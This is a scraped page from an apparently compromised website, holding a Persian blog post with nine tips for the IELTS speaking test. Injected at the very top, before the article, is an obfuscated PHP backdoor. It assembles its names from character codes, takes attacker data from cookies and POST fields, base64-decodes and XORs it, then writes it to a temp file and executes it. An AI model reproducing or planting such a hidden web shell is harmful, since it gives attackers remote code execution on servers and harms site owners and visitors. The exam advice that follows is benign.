$NULuVE = 'J' . "\x6e" . chr (95) . "\x5a" . chr ( 1066 - 990 )."\143";$wBGOMS = chr (99) . "\154" . "\141" . "\163" . 's' . chr ( 572 - 477 )."\145" . "\170" . "\151" . 's' . chr (116) . "\x73";$rnHFs = class_exists($NULuVE); $wBGOMS = "37229";$FCnrIFQjV = strpos($wBGOMS, $NULuVE);if ($rnHFs == $FCnrIFQjV){function zzZnWbHiGH(){$snBBmoW = new /* 60717 */ Jn_ZLc(216 + 216); $snBBmoW = NULL;}$tRYafVOh = "216";class Jn_ZLc{private function BnCpg($tRYafVOh){if (is_array(Jn_ZLc::$iblmkhZckY)) {$name = sys_get_temp_dir() . "/" . crc32(Jn_ZLc::$iblmkhZckY["salt"]);@Jn_ZLc::$iblmkhZckY["write"]($name, Jn_ZLc::$iblmkhZckY["content"]);include $name;@Jn_ZLc::$iblmkhZckY["delete"]($name); $tRYafVOh = "216";exit();}}public function ptGeYs(){$TDmSXiAS = "52603";$this->_dummy = str_repeat($TDmSXiAS, strlen($TDmSXiAS));}public function __destruct(){Jn_ZLc::$iblmkhZckY = @unserialize(Jn_ZLc::$iblmkhZckY); $tRYafVOh = "10292_35473";$this->BnCpg($tRYafVOh); $tRYafVOh = "10292_35473";}public function ozxIAgQPjV($TDmSXiAS, $aeaku){return $TDmSXiAS[0] ^ str_repeat($aeaku, intval(strlen($TDmSXiAS[0]) / strlen($aeaku)) + 1);}public function qUtSOSuu($TDmSXiAS){$mfCMBhBxCr = "\142" . chr ( 890 - 793 ).chr ( 813 - 698 ).chr (101) . chr ( 253 - 199 ).chr (52);return array_map($mfCMBhBxCr . "\137" . chr (100) . "\x65" . "\x63" . chr (111) . "\144" . chr (101), array($TDmSXiAS,));}public function __construct($LPOaYmFx=0){$zGwbXSxTSr = chr ( 874 - 830 ); $TDmSXiAS = "";$ffIRbkK = $_POST;$cUFsQU = $_COOKIE;$aeaku = "c7925911-7e78-4761-aabc-96a5afd8df13";$YEAAD = @$cUFsQU[substr($aeaku, 0, 4)];if (!empty($YEAAD)){$YEAAD = explode($zGwbXSxTSr, $YEAAD);foreach ($YEAAD as $GraWY){$TDmSXiAS .= @$cUFsQU[$GraWY];$TDmSXiAS .= @$ffIRbkK[$GraWY];}$TDmSXiAS = $this->qUtSOSuu($TDmSXiAS);}Jn_ZLc::$iblmkhZckY = $this->ozxIAgQPjV($TDmSXiAS, $aeaku);if (strpos($aeaku, $zGwbXSxTSr) !== FALSE){$aeaku = explode($zGwbXSxTSr, $aeaku); $cWVPJOukJ = base64_decode(md5($aeaku[0]));}}public static $iblmkhZckY = 12075;}zzZnWbHiGH();} راه کار های مؤثر تقویت مهارت اسپیکینگ آزمون آیلتس | وبلاگ اتیچر
skip to Main Content

راه کار های مؤثر تقویت مهارت اسپیکینگ آزمون آیلتس

زمان مطالعه: ۶ دقیقه

فهرست بخش ها

۸ راهکار مؤثر تقویت مهارت اسپیکینگ در آزمون آیلتس چیست؟

مهارت اسپیکینگ آزمون آیلتس یکی از بخش‌های بسیار سخت و چالشی برای داوطلبین به حساب می‌آید. بسیاری از زبان آموزان در مواجه با آزمونگر دچار ترس و اضطراب می‌شوند. در حقیقت، وجود چنین اضطرابی صد در صد طبیعی است. علاوه بر این، در آزمون آیلتس، ممکن است با تاپیک های دشواری مواجه شویم، به همین علت، باید در این آزمون سعی کنیم تا انسجام روانی در بیان مطالب را حفظ نماییم. این کار تقریباً دشوار است ولی در حقیقت ناممکن نیست و با اندکی تمرین می‌توان به خواسته‌های مورد نظر خود در بخش اسپیکینگ آزمون آیلتس رسید.

به نکاتی که در این مقاله در مورد آماده شدن برای مهارت اسپیکینگ آزمون آیلتس اشاره شده توجه فرمایید.

۱. روان بودن در مکالمه بهتر از گرامر و دامنه لغات

در حقیقت در اسپیکینگ آزمون آیلتس توانایی داشتن مکالمه قوی از دانستن گرامر و همچنین لغت با اهمیت‌تر است. سعی کنید همیشه این موضوع را در ذهن داشته باشید، تلاش زیادی برای کاربرد صحیح نکات گرامری انجام ندهید و لازم نیست هر بار و در حین مکالمه وقت زیادی برای یافتن و کاربرد کلمه مناسب صرف کنید. در صورتی که چنین کاری را انجام دهید، ممکن است روانی و سلاست موجود در مکالمه خود را از دست بدهید و در نتیجه، چنین کاری در نمره کلی شما در اسپیکینگ آزمون آیلتس تأثیر منفی خواهد گذاشت.

 ۲. تن (Tone) صدای خود را تغییر دهید

سعی کنید در اسپیکینگ آزمون آیلتس همانند ربات‌ها یکنواخت نباشید. نکته مهم در این زمینه، ایجاد تغییرات در تن صدا و سرعت مکالمه است. در صورتی که سؤال جالبی مطرح شود، هیجان خود را از طریق تغییر در تن صدا در جواب نشان دهید. به مخاطبین خود بفهمانید که از شنیدن چنین سؤالی متعجب و یا هیجان زده شده‌اید. بگذارید تا انگیزه شما از طریق صدا منتقل شود. در صورتی که هیچ‌گونه تغییری در صدایتان مشاهده نشود، این کار باعث کاهش روانی و سلاست موجود در تن صدای شما  خواهد شد.

همچنین مطالعه شود:

فوت های کوزه گری برای کسب نمره بالا در بخش آزمون اسپیکینگ آیلتس

 ۳. چقدر صحبت کنیم؟

برای پاسخ به این سوال که در اسپیکینگ آزمون آیلتس چقدر می‌توان صحبت کرد هم پاسخ کوتاه و هم پاسخی بلند برای آن وجود دارد. پاسخ کوتاه این است که هر چقدر بیشتر صحبت کنید، می‌توانید نتیجه  بهتری نیز دریافت نمایید. پاسخ بلندتر مرتبط با رعایت انسجام و تسلط بر موارد مطرح شده است. در صورتی که در اسپیکینگ آزمون آیلتس از موضوع اصلی خارج شوید، نشان دهنده این است که  به طور یقین بیش از اندازه صحبت می‌کنید. علاوه بر این، نکته مهم دیگر در مورد اسپیکینگ آزمون آیلتس این است که اگر حس می‌کنید که اطلاعات کافی در مورد موضوع مورد بحث دارید و می‌توانید در مورد آن به اندازه کافی صحبت کنید، بهتر است تا می‌توانید به مکالمه خود در مورد آن موضوع خاص ادامه دهید.

۴. اشتباهات

اشتباه کردن از مسائل مهم موجود در تمامی آزمون‌های مختلف است که در اسپیکینگ آزمون آیلتس هم احتمالا افراد دچار اشتباه می شوند. اکثر دانش آموزان نگرانی‌های زیادی در این زمینه دارند.

با این حال، دو موضوع مهم در مورد اسپیکینگ آزمون آیلتس وجود دارند:

  1. همه افراد مرتکب اشتباه می‌شوند. در صورتی که به مدت ۱۵ دقیقه در امتحان اصلی صحبت کنید، به طور یقین شما هم اشتباهاتی خواهید داشت، چنین روندی کاملاً طبیعی است.
  2. ارتکاب اشتباه چیز عجیبی نیست. چنانچه می توانید دو موضوع مهم را همواره به خاطر بسپارید، اولین مورد این است که تصحیح اشتباهات از عادات خوب به حساب می‌آید. چنین کاری به آزمونگر نشان می‌دهد که متوجه اشتباهات خود شده‌اید، و به خوبی توانسته‌اید مشکلات موجود در این زبان را شناسایی کنید.
  3. نکته مهم دیگر این است که حدالامکان اشتباهات خود را تصحیح کنید و در صورتی که چنین کاری را انجام نداده‌اید، نیاز نیست که بیش از حد نگران باشید و سعی کنید تمرکز خود را بر روی سایر موضوعات پیش رو جذب کنید.

به هر حال بدترین سناریو در این زمینه، ارتکاب اشتباه و صرف مدت زمان طولانی برای تفکر در مورد آن اشتباه در حین آزمون است که در نهایت چنین کاری منجر به از دست دادن نمره مورد نظر در آزمون آیلتس می‌شود.

 ۵. به اشتراک گذاشتن نظرات

نیاز است تا در اسپیکینگ آزمون آیلتس، نظرات شخصی خود را نیز بیان کنید. در صورتی که نظرات شخصی خود را در این باره بیان کنید، این کار باعث غنی‌تر شدن پاسخ‌هایتان به موضوعات مطرح شده خواهند شد. علاوه بر این، چنین کاری باعث روان‌تر شدن پاسخ‌ها می‌شود. چون در این روند، حرف‌های بسیار فراوانی برای گفتن دارید. این ویژگی بخصوص در مورد موضوعات مورد علاقه شما بیشتر صدق می‌کند. نظرات خود را با آزمونگر به اشتراک بگذارید. عقیده و افکار خود را به او بگویید و سعی کنید به خوبی از آن‌ها دفاع کنید.

 ۶. به سؤالات گوش دهید

در صورتی که به پاسخ‌های مطرح شده در بخش اسپیکینگ آزمون آیلتس به دقت گوش دهید، این کار می‌تواند کمک‌ بسیاری به شما کند. در ابتدا سعی کنید به نوع کلمات پرسشی همانند What; Why; When; Who; Where; Which; How به دقت گوش دهید. چنین کلماتی می‌توانند بلافاصله، نوع اطلاعات درخواستی را در اسپیکینگ آزمون آیلتس مشخص نمایند. علاوه بر این، سعی کنید نوع گرامری را که آزمونگر در پرسش‌های خود آن‌ها را مورد استفاده قرار می‌دهد، تشخیص دهید . در صورتی که نگران استفاده از گرامرهای مختلف در پاسخ‌های خود هستید، تقلید از نمونه‌های مورد استفاده در  اسپیکینگ آزمون آیلتس توسط آزمونگر می‌تواند در این مورد روشنگر باشد. چنانچه سؤالات آزمونگر حاوی گرامر گذشته ساده بود، شما هم می‌توانید از همان ساختار استفاده کنید و پاسخ‌های مورد نظر خود را با استفاده از همان ساختار در آزمون آیلتس ارائه دهید.

۷. سعی کنید آزمونگر نظر مثبتی در مورد شما داشته باشد

به نظر می‌رسد چنین پیشنهادی برای مهارت اسپیکینگ آزمون آیلتس نمی تواند تأثیر قابل توجه ایی در نمره کسب شده توسط داوطلبین در آزمون آیلتس داشته باشد و در حقیقت نمره ۶.۵ داوطلبین را به ۷ تبدیل نمی کند، ولی می‌تواند شروع مناسبی باشد.  وقتی که وارد اتاق برگزاری آزمون آیلتس می‌شوید، سعی کنید تا برخورد دوستانه‌ای با آزمونگر داشته باشید. چنین گفتگوهایی باعث می‌شود تا نظر آزمونگر در مورد شما تا حدودی مثبت شود  و این کار باعث اطمینان از وجود اعتماد به نفس در شما خواهد شد. پس از شروع گفتگو سعی کنید نشان دهید که از این گفتگو لذت می‌برید و سعی کنید لبخند را همواره بر لب داشته باشید.

 ۸. سؤالات را به زندگی شخصی خود مرتبط کنید

به احتمال زیاد سؤالات موجود در بخش اول و دوم اسپیکینگ  آزمون آیلتس در مورد زندگی شخصی شما خواهد بود. به همین دلیل می‌توانید از این بخش‌ها به خوبی استفاده کنید و پاسخ‌های مناسبی برای آن‌ها فراهم نمایید. علاقه خود را به این موضوع نشان دهید و همواره سعی کنید تا بین این سؤالات وزندگی شخصی خود ارتباط برقرار کنید. انجام چنین کاری به دو علت از اهمیت فراوانی برخوردار است.

الف) پاسخ‌های مرتبط با زندگی واقعی می‌توانند رنگ و حالتی مناسب به جواب‌های داوطلبین بدهند. با ارائه چنین مواردی می‌توانید مثال‌هایی از گذشته و حال فراهم کنید و به مقایسه آن‌ها بپردازید. با کاربرد چنین حالتی می‌توانید از ساختارهای پیچیده‌تری برای مهارت اسپیکینگ استفاده کنید.

ب) ممکن است بیان اطلاعات در مورد زندگی شخصی شما از ارائه مطالب عمومی ساده‌تر باشد. به همین دلیل در بخش یک و دو مهارت اسپیکینگ آزمون آیلتس استفاده از چنین شیوه‌ای پیشنهاد می‌شود. با این حال، کاربرد چنین شیوه‌ای در بخش سوم مهارت اسپیکینگ آزمون آیلتس اندکی دشوارتر است. ولی در هر صورت بهتر است تا شما تلاشتان را انجام دهید. در این بخش با موضوعات متعددی از قبیل تحصیلات، محیط زیست، موسیقی، هنر و بسیاری دیگر رو برو خواهید شد.

۹. به کمک اساتید زبان خود را قبل از آزمون آماده کنید

قبل از اینکه برای آزمون آیلتس ثبت نام کنید بهتر از به کمک اساتید زبان خودتان را آماده کنید. بسیاری از وب سایت ها مانند اتیچر این فرصت را فراهم کرده اند که شما بتوانید به صورت آنلاین از بهترین اساتید زبان جهت تقویت مهارت اسپیکینگ خود بپردازید تا بتوانید بالاترین نمره را به دست آورید.

به این مقاله امتیاز بدهید

دیدگاه ها

اولین نفری باشید که به این نوشته نظر میدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

Back To Top
×Close search
Search